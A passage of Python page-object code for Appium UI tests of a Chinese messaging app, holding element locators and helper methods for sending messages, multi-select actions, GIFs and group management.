\"cc chat send normal\"'),\n 'GIF按钮': (MobileBy.IOS_PREDICATE, 'name == \"{gif\"'),\n 'gif图片': (MobileBy.XPATH,\n '//*[@name=\"cc chat gif close\"]/../following-sibling::*[1]/XCUIElementTypeCell/XCUIElementTypeOther/XCUIElementTypeImage'),\n '关闭GIF按钮': (MobileBy.IOS_PREDICATE, 'name == \"cc chat gif close\"'),\n '文件按钮': (MobileBy.IOS_PREDICATE, 'name CONTAINS \"cc_chat_icon_file_normal\"'),\n '表��页': (MobileBy.ID, 'com.chinasofti.rcs:id/gv_expression'),\n '表情': (MobileBy.ID, 'com.chinasofti.rcs:id/iv_expression_image'),\n '输入框': (MobileBy.IOS_PREDICATE, 'type==\"XCUIElementTypeTextView\"'),\n '视频播放按钮': (MobileBy.IOS_PREDICATE, 'name contains \"cc chat play\"'),\n '关闭表情页': (MobileBy.ID, 'com.chinasofti.rcs:id/ib_expression_keyboard'),\n '多选返回': (MobileBy.ID, 'com.chinasofti.rcs:id/back_arrow'),\n '多选计数': (MobileBy.ID, 'com.chinasofti.rcs:id/tv_count'),\n '多选选择框': (MobileBy.ID, 'com.chinasofti.rcs:id/multi_check'),\n '多选删除': (MobileBy.ID, 'com.chinasofti.rcs:id/multi_btn_delete'),\n '多选转发': (MobileBy.ID, 'com.chinasofti.rcs:id/multi_btn_forward'),\n '删除已选信息': (MobileBy.ID, 'com.chinasofti.rcs:id/btn_ok'),\n '取消删除已选信息': (MobileBy.ID, 'com.chinasofti.rcs:id/btn_cancel'),\n \"返回上一级\": (MobileBy.ID, \"com.chinasofti.rcs:id/left_back\"),\n \"文本发送按钮\": (MobileBy.ID, \"com.chinasofti.rcs:id/ib_send\"),\n \"语音小红点\": (MobileBy.ID, \"com.chinasofti.rcs:id/ib_record_red_dot\"),\n \"粘贴\": (MobileBy.ID, \"com.chinasofti.rcs:id/ib_pic\"),\n \"照片选择框\": (MobileBy.ID, \"com.chinasofti.rcs:id/iv_select\"),\n \"更多小红点\": (MobileBy.ID, \"com.chinasofti.rcs:id/id_more_red_dot\"),\n \"预览文件_返回\": (MobileBy.ID, 'com.chinasofti.rcs:id/back'),\n '预览文件_更多': (MobileBy.ID, 'com.chinasofti.rcs:id/menu'),\n '定位_地图': ('id', 'com.chinasofti.rcs:id/location_info_view'),\n '始终允许': (MobileBy.XPATH, \"//*[contains(@text, '始终允许')]\"),\n '小键盘麦克标志': (MobileBy.IOS_PREDICATE, 'name == \"dictation\"'),\n '文本消息': (MobileBy.XPATH,\n \"//XCUIElementTypeCell/XCUIElementTypeOther/XCUIElementTypeImage/XCUIElementTypeOther\"),\n '最后一条文本消息': (MobileBy.XPATH,\n \"//XCUIElementTypeTable/XCUIElementTypeCell[last()]/XCUIElementTypeOther/XCUIElementTypeImage/XCUIElementTypeOther\"),\n '最后一条文本消息_c': (MobileBy.XPATH, \"//XCUIElementTypeTable[1]/XCUIElementTypeCell[last()]\"),\n '消息记录': (MobileBy.XPATH, '//XCUIElementTypeTable/XCUIElementTypeCell'),\n '最后一条表情消息的表情': (MobileBy.XPATH,\n '(//XCUIElementTypeTable/XCUIElementTypeCell[last()]/XCUIElementTypeOther/XCUIElementTypeImage/XCUIElementTypeOther/XCUIElementTypeImage[@name])[last()]'),\n '最后一条消息记录发送失败标识': (MobileBy.XPATH,\n '//XCUIElementTypeTable/XCUIElementTypeCell[last()]/XCUIElementTypeButton[contains(@name,\"cc chat again send normal\")]'),\n '最后一条消息记录已读动态': (MobileBy.XPATH, '//XCUIElementTypeTable/XCUIElementTypeCell[last()]/XCUIElementTypeButton[not(@name)]'),\n '多选关闭按钮': (MobileBy.IOS_PREDICATE, 'name==\"cc chat checkbox close\"'),\n '多选删除按钮': (MobileBy.IOS_PREDICATE, 'name==\"cc chat checkbox delete normal\"'),\n '多选转发按钮': (MobileBy.IOS_PREDICATE, 'name==\"cc chat checkbox forward norma\"'),\n '已选择': (MobileBy.IOS_PREDICATE, 'name==\"已选择\"'),\n '未选择': (MobileBy.IOS_PREDICATE, 'name==\"未选择\"'),\n '已选择数量': (MobileBy.XPATH, '//*[@name=\"已选择\"]/following-sibling::XCUIElementTypeStaticText[1]'),\n '多选最后一条消息勾选框': (\n MobileBy.XPATH, '//XCUIElementTypeTable/XCUIElementTypeCell[last()]/XCUIElementTypeButton[2]'),\n '群短信': (MobileBy.ACCESSIBILITY_ID, 'cc_chat_input_ic_groupmassage'),\n '群人数文本': (MobileBy.XPATH,\n '//*[@name=\"back\"]/../following-sibling::XCUIElementTypeOther[1]/XCUIElementTypeOther/XCUIElementTypeStaticText[2]'),\n '我的电脑-聊天记录': (MobileBy.XPATH,\n '//XCUIElementTypeApplication[@name=\"和飞信\"]/XCUIElementTypeWindow[1]/XCUIElementTypeOther/XCUIElementTypeOther/XCUIElementTypeOther/XCUIElementTypeOther/XCUIElementTypeOther/XCUIElementTypeOther/XCUIElementTypeOther/XCUIElementTypeTable/XCUIElementTypeCell/XCUIElementTypeOther/XCUIElementTypeImage[1]/XCUIElementTypeOther'),\n }\n\n @TestLogger.log()\n def make_sure_chatwindow_have_message(self, content='文本消息', times=1):\n \"\"\"确保当前页面有文本消息记录\"\"\"\n if self.is_element_present_message():\n time.sleep(3)\n else:\n while times > 0:\n times = times - 1\n self.click_input_box()\n self.input_message_text(content)\n self.click_send_button()\n self.click_input_box()\n self.input_message_text(content)\n self.click_send_button()\n time.sleep(2)\n\n @TestLogger.log()\n def click_start_call_button(self):\n \"\"\"点击开始呼叫按钮 \"\"\"\n self.click_element((MobileBy.IOS_PREDICATE, 'name CONTAINS \"呼叫\"'))\n\n\n @TestLogger.log('点击输入框')\n def click_input_box(self):\n self.click_element(self.__locators['说点什么'])\n\n @TestLogger.log('输入消息文本')\n def input_message_text(self, content):\n \"\"\"输入消息文本(清空之前文本框的文本)\"\"\"\n self.input_text(self.__locators['说点什么'], content)\n\n @TestLogger.log('输入消息文本')\n def input_message_text2(self, content):\n \"\"\"输入消息文本--不清空之前文本框的文本\"\"\"\n self.input_text2(self.__locators['说点什么'], content)\n\n\n @TestLogger.log()\n def long_press_input_box(self):\n \"\"\"长按输入框(备注:群聊使用该方法需要发送两条文本消息)\"\"\"\n self.swipe_by_direction(self.__class__.__locators['说点什么'], 'press',duration=2)\n time.sleep(2)\n\n\n\n @TestLogger.log('点击发送按钮')\n def click_send_button(self):\n self.click_element(self.__locators['发送按钮'])\n\n @TestLogger.log()\n def select_members_by_name(self, name='大佬1'):\n \"\"\"通过名字选择成员\"\"\"\n locator = (MobileBy.ACCESSIBILITY_ID, '%s' % name)\n self.click_element(locator)\n\n @TestLogger.log()\n def get_input_message(self):\n \"\"\"获取输入框的信息\"\"\"\n el = self.get_element(self.__class__.__locators[\"说点什么\"])\n return el.text\n\n @TestLogger.log('发送多条文本消息')\n def send_mutiple_message(self, text='文本消息', times=15):\n while times > 0:\n times = times - 1\n self.click_input_box()\n self.input_message_text(text)\n self.click_send_button()\n time.sleep(2)\n\n\n @TestLogger.log()\n def click_send_slide_up(self, duration=5):\n \"\"\"点击发送按钮并向上滑动\"\"\"\n el = self.get_element(self.__class__.__locators[\"发送按钮\"])\n rect = el.rect\n left, right = int(rect['x']) + 1, int(rect['x'] + rect['width']) - 1\n top, bottom = int(rect['y']) + 1, int(rect['y'] + rect['height']) - 1\n x_start = (left + right) // 2\n x_end = (left + right) // 2\n y_start = bottom\n y_end = top - 200\n self.driver.execute_script(\"mobile:dragFromToForDuration\",\n {\"duration\": duration, \"element\": None, \"fromX\": x_start,\n \"fromY\": y_start,\n \"toX\": x_end, \"toY\": y_end})\n\n @TestLogger.log()\n def click_send_slide_down(self, duration=5):\n \"\"\"点击发送按钮并向下滑动\"\"\"\n el = self.get_element(self.__class__.__locators[\"发送按钮\"])\n rect = el.rect\n left, right = int(rect['x']) + 1, int(rect['x'] + rect['width']) - 1\n top, bottom = int(rect['y']) + 1, int(rect['y'] + rect['height']) - 1\n x_start = (left + right) // 2\n x_end = (left + right) // 2\n y_start = top\n y_end = bottom + 200\n self.driver.execute_script(\"mobile:dragFromToForDuration\",\n {\"duration\": duration, \"element\": None, \"fromX\": x_start,\n \"fromY\": y_start,\n \"toX\": x_end, \"toY\": y_end})\n\n @TestLogger.log()\n def get_width_of_last_msg(self):\n \"\"\"获取最后一条文本信息框的大小\"\"\"\n el = self.get_element(self.__class__.__locators[\"最后一条文本消息\"])\n rect = el.rect\n return rect[\"width\"]\n\n @TestLogger.log()\n def get_height_of_last_msg(self):\n \"\"\"获取最后一条文本信息框的大小\"\"\"\n el = self.get_element(self.__class__.__locators[\"最后一条文本消息\"])\n rect = el.rect\n return rect[\"height\"]\n\n @TestLogger.log()\n def click_exit_voice(self):\n \"\"\"点击退出语音录制\"\"\"\n self.click_element(self.__class__.__locators[\"退出按钮\"])\n\n @TestLogger.log()\n def is_exist_video_play_button(self):\n \"\"\"是否存在视频播放按钮\"\"\"\n return self._is_element_present(self.__class__.__locators[\"视频播放按钮\"])\n\n def is_exist_msg_dictation(self):\n \"\"\"当前页面是否有小键盘麦克\"\"\"\n el = self.get_elements(self.__locators['小键盘麦克标志'])\n return len(el) > 0\n\n @TestLogger.log('判断消息记录是否存在消息记录')\n def is_element_present_message(self):\n return self._is_element_present(self.__class__.__locators['聊天列表'])\n\n @TestLogger.log()\n def click_message_approval(self):\n \"\"\"点击审批内容\"\"\"\n self.click_element((MobileBy.IOS_PREDICATE, 'name CONTAINS \"审批\"'))\n\n @TestLogger.log()\n def press_and_move_right_approval(self):\n \"\"\"长按审批消息\"\"\"\n time.sleep(2)\n element = (MobileBy.IOS_PREDICATE, 'name CONTAINS \"审批\"')\n self.swipe_by_direction(element, 'right')\n time.sleep(2)\n\n @TestLogger.log()\n def press_and_move_right_daily_log(self):\n \"\"\"长按日志消息\"\"\"\n time.sleep(2)\n element = (MobileBy.IOS_PREDICATE, 'name CONTAINS \"日报\"')\n self.swipe_by_direction(element, 'right', duration=2)\n time.sleep(2)\n\n @TestLogger.log()\n def press_and_move_right_text_message(self):\n \"\"\"长按文本消息(备注:群聊使用该方法需要发送两条文本消息)\"\"\"\n time.sleep(2)\n locator = (MobileBy.XPATH, \"//XCUIElementTypeCell[last()]/XCUIElementTypeOther/XCUIElementTypeImage/XCUIElementTypeOther\")\n self.swipe_by_direction(locator, 'left')\n time.sleep(2)\n\n\n def is_exist_msg_videos(self):\n \"\"\"当前页面是否有发视频消息\"\"\"\n el = self.get_elements(self.__locators['消息视频'])\n return len(el) > 0\n\n def is_exist_msg_image(self):\n \"\"\"当前页面是否有发图片消息\"\"\"\n el = self.get_elements(self.__locators['消息图片'])\n return len(el) > 0\n\n @TestLogger.log()\n def click_msg_image(self, number):\n \"\"\"点击图片消息\"\"\"\n els = self.get_elements(self.__class__.__locators[\"消息图片\"])\n els[number].click()\n\n @TestLogger.log()\n def is_exists_group_by_name(self, name):\n \"\"\"是否存在指定群聊名\"\"\"\n locator = (MobileBy.XPATH, '//*[@resource-id=\"com.chinasofti.rcs:id/title\" and contains(@text, \"%s\")]' % name)\n return self._is_element_present(locator)\n\n @TestLogger.log()\n def is_exist_collection(self):\n \"\"\"是否存在消息已收藏\"\"\"\n return self.is_toast_exist(\"已收藏\")\n\n @TestLogger.log()\n def is_exist_forward(self):\n \"\"\"是否存在消息已转发\"\"\"\n return self.is_toast_exist(\"已转发\")\n\n @TestLogger.log()\n def click_take_picture(self):\n \"\"\"点击选择富媒体拍照\"\"\"\n self.click_element(self.__class__.__locators[\"富媒体拍照\"])\n\n @TestLogger.log()\n def is_send_sucess(self):\n \"\"\"当前页面是否有发送失败标识\"\"\"\n el = self.get_elements(self.__locators['发送失败标识'])\n if len(el) > 0:\n return False\n return True\n\n @TestLogger.log()\n def click_picture(self):\n \"\"\"点击选择照片\"\"\"\n self.click_element(self.__class__.__locators[\"选择照片\"])\n\n @TestLogger.log()\n def click_setting(self):\n \"\"\"点击设置\"\"\"\n self.click_element(self.__class__.__locators[\"设置\"])\n\n @TestLogger.log()\n def wait_for_page_load(self, timeout=8, auto_accept_alerts=True):\n \"\"\"等待群聊页面加载\"\"\"\n try:\n self.wait_until(\n timeout=timeout,\n auto_accept_permission_alert=auto_accept_alerts,\n condition=lambda d: self._is_element_present(self.__class__.__locators[\"多方通话\"])\n )\n except:\n message = \"页面在{}s内,没有加载成功\".format(str(timeout))\n raise AssertionError(\n message\n )\n return self\n\n @TestLogger.log()\n def wait_for_group_control_page_load(self, timeout=8, auto_accept_alerts=True):\n \"\"\"等待群管理页面加载\"\"\"\n try:\n self.wait_until(\n timeout=timeout,\n auto_accept_permission_alert=auto_accept_alerts,\n condition=lambda d: self._is_element_present(self.__class__.__locators[\"解散群\"])\n )\n except:\n message = \"页面在{}s内,没有加载成功\".format(str(timeout))\n raise AssertionError(\n message\n )\n return self\n\n @TestLogger.log()\n def is_on_this_page(self):\n \"\"\"当前页面是否在群聊天页\"\"\"\n el = self.get_elements(self.__locators['多方通话'])\n if len(el) > 0:\n return True\n return False\n\n @TestLogger.log()\n def click_profile(self):\n \"\"\"点击选择名片\"\"\"\n self.click_element(self.__class__.__locators[\"选择名片\"])\n\n @TestLogger.log()\n def click_back(self):\n \"\"\"点击返回按钮\"\"\"\n self.click_element(self.__class__.__locators[\"返回\"])\n\n @TestLogger.log()\n def is_exist_undisturb(self):\n \"\"\"是否存在消息免打扰标志\"\"\"\n return self._is_element_present(self.__class__.__locators[\"消息免打扰\"])\n\n\n @TestLogger.log()\n def press_file_to_do(self, file, text):\n \"\"\"长按指定文件进行操作\"\"\"\n el = self.get_element((MobileBy.XPATH, \"//*[contains(@text, '%s')]\" % file))\n self.press(el)\n self.click_element(self.__class__.__locators[text])\n\n @TestLogger.log()\n def press_file(self, file):\n \"\"\"长按指定文件\"\"\"\n el = self.get_element((MobileBy.XPATH, \"//*[contains(@text, '%s')]\" % file))\n self.press(el)\n\n @TestLogger.log()\n def is_address_text_present(self):\n \"\"\"判断位置信息是否在群聊页面发送\"\"\"\n el = self.get_element((MobileBy.ID, 'com.chinasofti.rcs:id/lloc_famous_address_text'))\n if el:\n return True\n else:\n return False\n\n @TestLogger.log()\n def press_message_to_do(self, text):\n \"\"\"长按指定信息进行操作\"\"\"\n el = self.get_element((MobileBy.ID, 'com.chinasofti.rcs:id/lloc_famous_address_text'))\n self.press(el)\n self.click_element(self.__class__.__locators[text])\n\n @TestLogger.log()\n def wait_for_message_down_file(self, timeout=20, auto_accept_alerts=True):\n \"\"\"等待消息发送成功\"\"\"\n try:\n self.wait_until(\n timeout=timeout,\n auto_accept_permission_alert=auto_accept_alerts,\n condition=lambda d: self._is_element_present(self.__class__.__locators[\"勾\"])\n )\n except:\n message = \"消息在{}s内,没有发送成功\".format(str(timeout))\n raise AssertionError(\n message\n )\n return self\n\n @TestLogger.log()\n def is_exist_network(self):\n \"\"\"是否存网络不可用\"\"\"\n return self.is_toast_exist(\"网络不可用,请检查网络设置\")\n\n @TestLogger.log()\n def click_send_again(self):\n \"\"\"点击重新发送gif\"\"\"\n self.click_element(self.__class__.__locators[\"发送失败标识\"])\n self.click_element(self.__class__.__locators[\"重发消息确定\"])\n\n @TestLogger.log()\n def is_exist_msg_send_failed_button(self):\n \"\"\"判断是否有重发按钮\"\"\"\n el = self.get_elements(self.__locators['重发按钮'])\n return len(el) > 0\n\n @TestLogger.log()\n def click_msg_send_failed_button(self):\n \"\"\"点击重发按钮\"\"\"\n self.click_element(self.__class__.__locators[\"重发按钮\"])\n\n @TestLogger.log()\n def click_resend_confirm(self):\n \"\"\"点击重发消息确定\"\"\"\n self.click_element(self.__class__.__locators[\"重发消息确定\"])\n\n @TestLogger.log()\n def click_clean_video(self):\n \"\"\"点击删除消息视频\"\"\"\n try:\n el = self.get_element(self.__class__.__locators[\"消息视频\"])\n self.press(el)\n self.click_element(self.__class__.__locators[\"删除\"])\n except:\n pass\n return self\n\n @TestLogger.log()\n def press_voice_message_to_do(self,text):\n \"\"\"长按语言消息体\"\"\"\n el = self.get_element((MobileBy.ID, 'com.chinasofti.rcs:id/linearlayout_msg_content'))\n self.press(el)\n self.click_element(self.__class__.__locators[text])\n\n @TestLogger.log()\n def get_width_of_msg_of_text(self):\n \"\"\"获取文本信息框的大小\"\"\"\n el=self.get_element((MobileBy.ID,'com.chinasofti.rcs:id/tv_message'))\n rect=el.rect\n return rect[\"width\"]\n\n @TestLogger.log()\n def is_call_page_load(self):\n \"\"\"判断是否可以发起呼叫\"\"\"\n el = self.get_element((MobileBy.ID, 'com.android.incallui:id/endButton'))\n if el:\n return True\n else:\n return False\n\n @TestLogger.log()\n def click_end_call_button(self):\n \"\"\"点击结束呼叫按钮 \"\"\"\n self.click_element((MobileBy.ID, 'com.android.incallui:id/endButton'))\n\n @TestLogger.log()\n def click_location_back(self):\n \"\"\"点击位置页面返回 \"\"\"\n self.click_element(self.__class__.__locators['位置返回'])\n\n @TestLogger.log()\n def get_picture_nums(self):\n \"\"\"获取当前页面图片元素数量\"\"\"\n els = self.get_elements(self.__class__.__locators['图片元素数量'])\n return len(els)\n\n @TestLogger.log()\n def click_add_member_button(self):\n \"\"\"点击添加成员按钮\"\"\"\n self.click_element(self.__class__.__locators[\"添加群成员按钮\"])\n\n @TestLogger.log()\n def click_delete_member_button(self):\n \"\"\"删除成员按钮\"\"\"\n self.click_element(self.__class__.__locators[\"删���群成员按钮\"])\n\n @TestLogger.log()\n def click_delete_member_sure_button(self):\n \"\"\"删除成员确定按钮\"\"\"\n self.click_element(self.__class__.__locators[\"删除群成员确定按钮\"])\n\n @TestLogger.log()\n def wait_for_page_setting_load(self, timeout=8, auto_accept_alerts=True):\n \"\"\"等待群聊设置页面加载\"\"\"\n try:\n self.wait_until(\n timeout=timeout,\n auto_accept_permission_alert=auto_accept_alerts,\n condition=lambda d: self._is_element_present(self.__class__.__locators[\"添加群成员按钮\"])\n )\n except:\n message = \"页面在{}s内,没有加载成功\".format(str(timeout))\n raise AssertionError(\n message\n )\n return self\n\n @TestLogger.log()\n def click_phone_contact(self):\n \"\"\"点击选择手机联系人\"\"\"\n self.click_element(self.__class__.__locators[\"选择手机联系人\"])\n\n @TestLogger.log()\n def no_disturbing_btn_is_enabled(self):\n \"\"\"获取群消息免打扰按钮状态是否可点击\"\"\"\n return self._is_enabled(self.__class__.__locators[\"群消息免打扰按钮\"])\n\n @TestLogger.log()\n def get_no_disturbing_btn_text(self):\n \"\"\"获取群消息免打扰按钮状态\"\"\"\n if self._is_element_present2(self.__class__.__locators[\"群消息免打扰按钮\"]):\n el = self.get_element(self.__class__.__locators[\"群消息免打扰按钮\"])\n return el.text\n\n @TestLogger.log()\n def click_no_disturbing_button(self):\n \"\"\"点击群消息免打扰开关\"\"\"\n self.click_element(self.__class__.__locators[\"群消息免打扰按钮\"])\n\n @TestLogger.log()\n def click_group_name(self):\n \"\"\"点击修改群名称按钮\"\"\"\n self.click_element(self.__class__.__locators[\"群名称\"])\n\n @TestLogger.log()\n def input_group_name_message(self, message):\n \"\"\"输入要修改的群名称\"\"\"\n self.input_text(self.__class__.__locators[\"修改群名称输入框\"], message)\n return self\n\n @TestLogger.log()\n def click_group_name_complete(self):\n \"\"\"点击修改群名称完成按钮\"\"\"\n self.click_element(self.__class__.__locators[\"修改群名称完成按钮\"])\n\n @TestLogger.log()\n def click_group_control(self):\n \"\"\"点击群管理按钮\"\"\"\n self.click_element(self.__class__.__locators[\"群管理\"])\n\n @TestLogger.log()\n def click_group_dissolve(self):\n \"\"\"点击解散群按钮\"\"\"\n self.click_element(self.__class__.__locators[\"解散群\"])\n\n @TestLogger.log()\n def click_group_dissolve_confirm(self):\n \"\"\"点击确认群解散按钮\"\"\"\n self.click_element(self.__class__.__locators[\"解散按钮\"])\n\n @TestLogger.log()\n def click_add_member_confirm_button(self):\n \"\"\"点击添加群成员确定按钮\"\"\"\n self.click_element(self.__class__.__locators[\"添加群成员确定按钮\"])\n\n @TestLogger.log()\n def click_voice_button(self):\n \"\"\"点击语音按钮\"\"\"\n self.click_element(self.__class__.__locators[\"语音按钮\"])\n\n @TestLogger.log()\n def is_exist_voice_button(self):\n \"\"\"是否存在语音按钮\"\"\"\n return self._is_element_present2(self.__class__.__locators[\"语音按钮\"])\n\n @TestLogger.log()\n def click_send_button(self):\n \"\"\"点击发送按钮\"\"\"\n self.click_element(self.__class__.__locators[\"发送按钮\"])\n\n @TestLogger.log()\n def _is_enabled_send_button(self):\n \"\"\"发送按钮是否可点击\"\"\"\n return self._is_enabled(self.__class__.__locators[\"发送按钮\"])\n\n @TestLogger.log()\n def is_exist_send_button(self):\n \"\"\"是否存在发送按钮\"\"\"\n return self._is_element_present2(self.__class__.__locators[\"发送按钮\"])\n\n @TestLogger.log()\n def click_add_button(self):\n \"\"\"点击更多加号按钮\"\"\"\n self.click_element(self.__class__.__locators[\"更多加号按钮\"])\n\n @TestLogger.log()\n def click_file_button(self):\n \"\"\"点击文件按钮\"\"\"\n self.click_element(self.__class__.__locators[\"文件按钮\"])\n\n @TestLogger.log()\n def is_exist_file_button(self):\n \"\"\"是否存在文件按钮\"\"\"\n return self._is_element_present(self.__class__.__locators[\"文件按钮\"])\n\n @TestLogger.log()\n def click_expression_button(self):\n \"\"\"点击表情按钮\"\"\"\n self.click_element(self.__class__.__locators[\"表情按钮\"])\n\n @TestLogger.log()\n def click_expression_wx(self):\n \"\"\"点击微笑表情\"\"\"\n self.click_element(self.__class__.__locators[\"微笑表情\"])\n\n @TestLogger.log()\n def click_expression_qx(self):\n \"\"\"点��窃喜表情\"\"\"\n self.click_element(self.__class__.__locators[\"窃喜表情\"])\n\n @TestLogger.log()\n def click_expression_lbt(self):\n \"\"\"点击流鼻涕表情\"\"\"\n self.click_element(self.__class__.__locators[\"流鼻涕表情\"])\n\n @TestLogger.log()\n def click_gif_button(self):\n \"\"\"点击GIF按钮\"\"\"\n self.click_element(self.__class__.__locators[\"GIF按钮\"])\n\n @TestLogger.log()\n def is_exists_gif_button(self):\n \"\"\"是否存在GIF按钮\"\"\"\n return self._is_element_present2(self.__class__.__locators[\"GIF按钮\"])\n\n @TestLogger.log()\n def click_send_gif(self):\n \"\"\"点击发送GIF图片\"\"\"\n self.click_element(self.__class__.__locators[\"gif图片\"])\n\n @TestLogger.log()\n def is_exist_close_gif(self):\n \"\"\"是否存在关闭GIF按钮\"\"\"\n return self._is_element_present(self.__class__.__locators[\"关闭GIF按钮\"])\n\n @TestLogger.log()\n def click_close_gif(self):\n \"\"\"点击关闭GIF按钮\"\"\"\n self.click_element(self.__class__.__locators[\"关闭GIF按钮\"])\n\n @TestLogger.log()\n def is_exist_expression_page(self):\n \"\"\"是否存在表情页\"\"\"\n return self._is_element_present(self.__class__.__locators[\"表情页\"])\n\n @TestLogger.log()\n def click_expression_page_close_button(self):\n \"\"\"点击表情页关闭\"\"\"\n self.click_element(self.__class__.__locators[\"关闭表情页\"])\n\n @TestLogger.log()\n def get_expressions(self):\n \"\"\"获取表情包\"\"\"\n els = self.get_elements(self.__locators['表情'])\n return els\n\n @TestLogger.log()\n def get_input_box(self):\n \"\"\"获取输入框\"\"\"\n el = self.get_element(self.__locators['输入框'])\n return el\n\n @TestLogger.log()\n def is_enabled_of_send_button(self):\n \"\"\"发送按钮状态\"\"\"\n flag = self._is_enabled((MobileBy.ID, 'com.chinasofti.rcs:id/ib_send'))\n return flag\n\n @TestLogger.log()\n def is_exist_multiple_selection_back(self):\n \"\"\"是否存在多选【×】关闭按钮\"\"\"\n return self._is_element_present(self.__class__.__locators[\"多选返回\"])\n\n @TestLogger.log()\n def is_exist_multiple_selection_count(self):\n \"\"\"是否存在多选计数\"\"\"\n return self._is_element_present(self.__class__.__locators[\"多选计数\"])\n\n @TestLogger.log()\n def get_multiple_selection_select_box(self):\n \"\"\"获取多选选择框\"\"\"\n els=self.get_elements(self.__class__.__locators[\"多选选择框\"])\n if els:\n return els\n else:\n raise AssertionError(\"没有找到多选选择框\")\n\n @TestLogger.log()\n def is_enabled_multiple_selection_delete(self):\n \"\"\"判断多选删除是否高亮展示\"\"\"\n return self._is_enabled(self.__class__.__locators[\"多选删除\"])\n\n @TestLogger.log()\n def is_enabled_multiple_selection_forward(self):\n \"\"\"判断多选转发是否高亮展示\"\"\"\n return self._is_enabled(self.__class__.__locators[\"多选转发\"])\n\n @TestLogger.log()\n def click_multiple_selection_back(self):\n \"\"\"点击多选返回\"\"\"\n self.click_element(self.__class__.__locators[\"多选返回\"])\n\n @TestLogger.log()\n def is_exist_multiple_selection_select_box(self):\n \"\"\"是否存在多选选择框\"\"\"\n return self._is_element_present(self.__class__.__locators[\"多选选择框\"])\n\n @TestLogger.log()\n def click_multiple_selection_delete(self):\n \"\"\"点击多选删除\"\"\"\n self.click_element(self.__class__.__locators[\"多选删除\"])\n\n @TestLogger.log()\n def click_multiple_selection_delete_cancel(self):\n \"\"\"点击取消删除已选信息\"\"\"\n self.click_element(self.__class__.__locators[\"取消删除已选信息\"])\n\n @TestLogger.log()\n def click_multiple_selection_delete_sure(self):\n \"\"\"点击确定删除已选信息\"\"\"\n self.click_element(self.__class__.__locators[\"删除已选信息\"])\n\n @TestLogger.log()\n def click_multiple_selection_forward(self):\n \"\"\"点击多选转发\"\"\"\n self.click_element(self.__class__.__locators[\"多选转发\"])\n\n @TestLogger.log()\n def press_audio_to_do(self,text):\n \"\"\"长按语音消息体进行操作\"\"\"\n els = self.get_elements(self.__class__.__locators[\"语音消息体\"])\n if els:\n self.press(els[0])\n self.click_element(self.__class__.__locators[text])\n else:\n raise AssertionError(\"没有找到语音消息体\")\n\n @TestLogger.log()\n def get_group_name(self):\n \"\"\"在群聊页面获取群聊名称\"\"\"\n return self.get_element(self.__class__.__locators['群聊001(2)']).text\n\n @TestLogger.log()\n def get_multiple_selection_count(self):\n \"\"\"获取多选计数框\"\"\"\n el = self.get_element(self.__class__.__locators[\"多选计数\"])\n if el:\n return el\n else:\n raise AssertionError(\"没有找到多选选择框\")\n\n @TestLogger.log()\n def press_voice_message(self):\n \"\"\"长按语言消息体\"\"\"\n el = self.get_element((MobileBy.ID, 'com.chinasofti.rcs:id/linearlayout_msg_content'))\n self.press(el)\n\n @TestLogger.log()\n def click_return(self):\n \"\"\"返回上一级\"\"\"\n self.click_element(self.__class__.__locators[\"返回上一级\"])\n\n @TestLogger.log()\n def get_height_of_msg_of_text(self):\n \"\"\"获取文本信息框的大小\"\"\"\n el = self.get_element((MobileBy.ID, 'com.chinasofti.rcs:id/tv_message'))\n rect = el.rect\n return rect[\"height\"]\n\n @TestLogger.log()\n def get_msg_of_text(self):\n \"\"\"获取文本信息框的信息\"\"\"\n el = self.get_element((MobileBy.ID, 'com.chinasofti.rcs:id/tv_message'))\n text = el.text\n return text\n\n @TestLogger.log()\n def input_text_message(self, message):\n \"\"\"输入文本信息\"\"\"\n self.input_text(self.__class__.__locators[\"输入框\"], message)\n return self\n\n @TestLogger.log()\n def send_text(self):\n \"\"\"发送文本\"\"\"\n self.click_element(self.__class__.__locators[\"文本发送按钮\"])\n time.sleep(1)\n\n @TestLogger.log()\n def is_exist_red_dot(self):\n \"\"\"是否存在语音小红点\"\"\"\n return self._is_element_present(self.__class__.__locators[\"语音小红点\"])\n\n @TestLogger.log()\n def click_long_copy_message(self):\n \"\"\"输入文本信息\"\"\"\n self.click_element(self.__locators[\"输入框\"])\n el = self.get_element(self.__locators[\"输入框\"])\n self.press(el)\n time.sleep(1.8)\n self.click_element(self.__locators[\"粘贴\"])\n\n @TestLogger.log()\n def click_long_message(self):\n \"\"\"输入文本信息\"\"\"\n el = self.get_elements(self.__locators[\"呵呵\"])\n el = el[-1]\n el.click()\n\n @TestLogger.log()\n def click_mutilcall(self):\n \"\"\"点击多方通话\"\"\"\n self.click_element(self.__class__.__locators[\"多方通话\"])\n\n @TestLogger.log()\n def select_picture(self):\n \"\"\"选择照片\"\"\"\n self.click_element(self.__class__.__locators[\"照片选择框\"])\n\n\n @TestLogger.log(\"文件是否发送成功\")\n def check_message_resend_success(self):\n return self._is_element_present(self.__class__.__locators['文件发送成功标志'])\n\n\n @TestLogger.log(\"当前页面是否有发文件消息\")\n def is_exist_msg_file(self):\n el = self.get_elements(('id', 'com.chinasofti.rcs:id/ll_msg'))\n return len(el) > 0\n\n @TestLogger.log(\"删除当前群聊发送的文件\")\n def delete_group_all_file(self):\n msg_file = self.get_elements(('id', 'com.chinasofti.rcs:id/ll_msg'))\n if msg_file:\n for file in msg_file:\n self.press(file)\n self.click_element(self.__class__.__locators['删除'])\n else:\n print('当前窗口没有可以删除的消息')\n\n @TestLogger.log(\"撤回文件\")\n def recall_file(self, file):\n el = self.wait_until(condition=lambda x:self.get_element((MobileBy.XPATH, \"//*[contains(@text, '%s')]\" % file)))\n self.press(el)\n self.click_element(self.__class__.__locators['撤回'])\n\n @TestLogger.log(\"点击发送的最后的文件\")\n def click_last_file_send_fail(self):\n ele_list = self.get_elements(('id', 'com.chinasofti.rcs:id/ll_msg'))\n ele_list[-1].click()\n\n @TestLogger.log(\"点击预览文件返回\")\n def click_file_back(self):\n self.click_element(self.__locators['预览文件_返回'])\n\n @TestLogger.log(\"预览文件里的更多按钮是否存在\")\n def is_exist_more_button(self):\n return self.wait_until(condition=lambda x:self._is_element_present(self.__locators['预览文件_更多']))\n\n @TestLogger.log(\"点击预览文件里的更多按钮\")\n def click_more_button(self):\n self.click_element(self.__locators['预览文件_更多'])\n\n @TestLogger.log(\"检查预览文件选项是否可用\")\n def check_options_is_enable(self):\n text_list = ['转发', '收藏', '其他应用打开']\n for text in text_list:\n if not self._is_enabled(('xpath', '//*[contains(@text, \"{}\")]'.format(text))):\n return False\n return True\n\n @TestLogger.log(\"当前页面是否有发地图消息\")\n def is_exist_loc_msg(self):\n 